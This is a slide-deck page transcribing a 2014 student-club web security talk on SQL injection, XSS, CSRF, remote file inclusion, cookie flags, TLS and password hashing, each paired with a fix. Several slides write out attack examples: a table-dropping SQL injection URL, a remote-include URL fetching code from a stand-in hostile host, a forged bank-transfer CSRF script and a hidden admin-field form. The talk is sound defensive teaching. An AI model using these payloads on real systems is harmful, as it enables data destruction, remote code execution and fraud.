Upgrade to Pro — share decks privately, control downloads, hide ads and more …

RCOS Security Talk

Kevin O'Connor
February 28, 2014
Programming
3
170

RCOS Security Talk

Basic overview of common vulnerabilities and best practices.

Kevin O'Connor

February 28, 2014
Tweet

More Decks by Kevin O'Connor

See All by Kevin O'Connor
SD&D 101
kevinoconnor7
0
71

Other Decks in Programming

See All in Programming
Kotlinの開発でも AIをいい感じに使いたい / Making the Most of AI in Kotlin Development
kohii00
5
2k
PHPのバージョンアップ時にも役立ったAST
matsuo_atsushi
0
230
From the Wild into the Clouds - Laravel Meetup Talk
neverything
0
190
DevNexus - Create AI Infused Java Apps with LangChain4j
kdubois
0
140
クックパッド検索システム統合/Cookpad Search System Consolidation
giga811
0
180
Better Code Design in PHP
afilina
0
190
Datadog DBMでなにができる? JDDUG Meetup#7
nealle
0
160
Rubyと自由とAIと
yotii23
6
1.9k
15分で学ぶDuckDBの可愛い使い方 DuckDBの最近の更新
notrogue
3
860
AWS Step Functions は CDK で書こう!
konokenj
5
920
Visual StudioのGitHub Copilotでいろいろやってみる
tomokusaba
1
230
Introduction to C Extensions
sylph01
3
130

Featured

See All Featured
Site-Speed That Sticks
csswizardry
4
420
Facilitating Awesome Meetings
lara
53
6.3k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
21
2.5k
Thoughts on Productivity
jonyablonski
69
4.5k
Building Adaptive Systems
keathley
40
2.4k
Designing for Performance
lara
605
68k
YesSQL, Process and Tooling at Scale
rocio
172
14k
A better future with KSS
kneath
238
17k
The Cost Of JavaScript in 2023
addyosmani
47
7.5k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
330
21k
The MySQL Ecosystem @ GitHub 2015
samlambert
251
12k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
251
21k

Transcript

  1. YOU SUCK at security

  2. 1. Your attackers are better

  3. Do NOT ROLL YOUR OWN

  4. None

  5. 1.  Open-source 2.  Audited 3.  Active community

  6. 2. Security is hard

  7. No. Seriously.

  8. 5,000 CVEs /yr

  9. 3. Dont trust input

  10. <?php! $query = "SELECT * FROM users WHERE username='". "$_GET[’user']."'";

    ! $result = mysql_query($query);!

  11. /derp.php?user=x’ DROP TABLE users;--!

  12. /derp.php?user=x’ DROP TABLE users;--! http://xkcd.com/327/

  13. <?php! $stmt = $dbh->prepare("SELECT FROM users WHERE username=?");! $stmt->execute(array($_GET['user']));! Use

    Parameter Binding

  14. <div><?php echo $row['username']; ?></div>! XSS. Inject javascript

  15. <html>! <body>! "<form method="POST" action="/users/add">! " "<input type="text" name="username">! "

    "<input type="password" name="password">! " "<input type="hidden" name="isAdmin" value="true">! " "<button type="submit">Create user</button>! "</form>! </body>! </html>! Unexpected Input. Sneaky DOM edit

  16. <?php! include('header.php');! include($_GET['page']);! include('footer.php');! ! /index.php?page=http://sketchy.su/BadTime.php! Remote Include.

  17. Sanitize all input

  18. Blacklist Only use if you know all cases Less restrictive

    on user

  19. Whitelist Best security Very restrictive

  20. Protip Markdown Google Caja

  21. 4. Protect your cookies

  22. Set-Cookie: SESSIONID=S8d2d1ffd5cb37209ef71982b80f16d7b! Bad Session

  23. Set-Cookie: SESSIONID=S8d2d1ffd5cb37209ef71982b80f16d7b; ! "HttpOnly; secure! GOOD Session Send over SSL

    only HTTP access only Prevents XSS theft

  24. 5. No Outsiders

  25. <iframe name="bank"></iframe>! <script>! "document.write('! " "<form ! " " action="https://MyBank.com/account/transfer"

    ! " " target="bank" ! " " method="POST" ! " " name="injected">! " " "<input type="text" name="amount" value="1000.00" />! " " "<input type="text" name="to" value="[email protected]" />! " "</form>! "');! "injected.submit();! </script>!

  26. CSRF sucks

  27. Block it. Require a unique token per request X-Frame-Options: Block

  28. 6. Encrypt everything

  29. Too expensive? startssl.com

  30. Self-sign Dev Environment openssl req -x509 -newkey des3:2048 -keyout key.pem

    - out cert.pem -days XXX!

  31. Verify All CERTS <?php! // cURL supports SSL verification! curl_setopt($ch,

    CURLOPT_SSL_VERIFYPEER, true);! ! //File_get_contents does NOT! file_get_contents($url);!

  32. Verify Servers Use server certs to verify servers to one

    another

  33. Harden SSL Disable SSL2 Disable TLS1.0 compression Disable weak ciphers

    (DES, RC4) h"p://blog.cloudflare.com/staying-­‐on-­‐top-­‐of-­‐tls-­‐a"acks  

  34. Force SSL

  35. 7. Use Slow Hashes

  36. No Plaintext Passwords Just don’t.

  37. Hash + Salt MD5 SHA1 … HMAC + bcrypt

  38. Wait. Explain. We want to be slow.

  39. Method password = bcrypt(HMAC(password, local_salt), bcrypt_salt)!

  40. Salt-free db Store salt on file system Two attacks needed

    Or both

  41. Migrate. Maintain two hashes Rehash on successful login Purge old

    hashes after x duration

  42. Lost Passwords Hash a one-time login ID

  43. 8. Remember the basics

  44. Random IV Having the IV be public is okay

  45. Wait for entropy /dev/random waits /dev/urandom non-blocking

  46. Use ECC NSA-Proof * * As far as we know,

    at least…

  47. Passwordless Login Use keypairs for server access

  48. 9. Use libraries

  49. Crypto NaCL SJCL Crypto++ QCA

  50. Web Frameworks Python: Django, Flask PHP: Laravel, Phalcon Go: Revel

    Node: Sails Java/Scala: Play Ruby: Rails

  51. Assume nothing Always research security best practices

  52. Questions? Complaints?

  53. Im hiring Sysadmin.union.rpi.edu/apply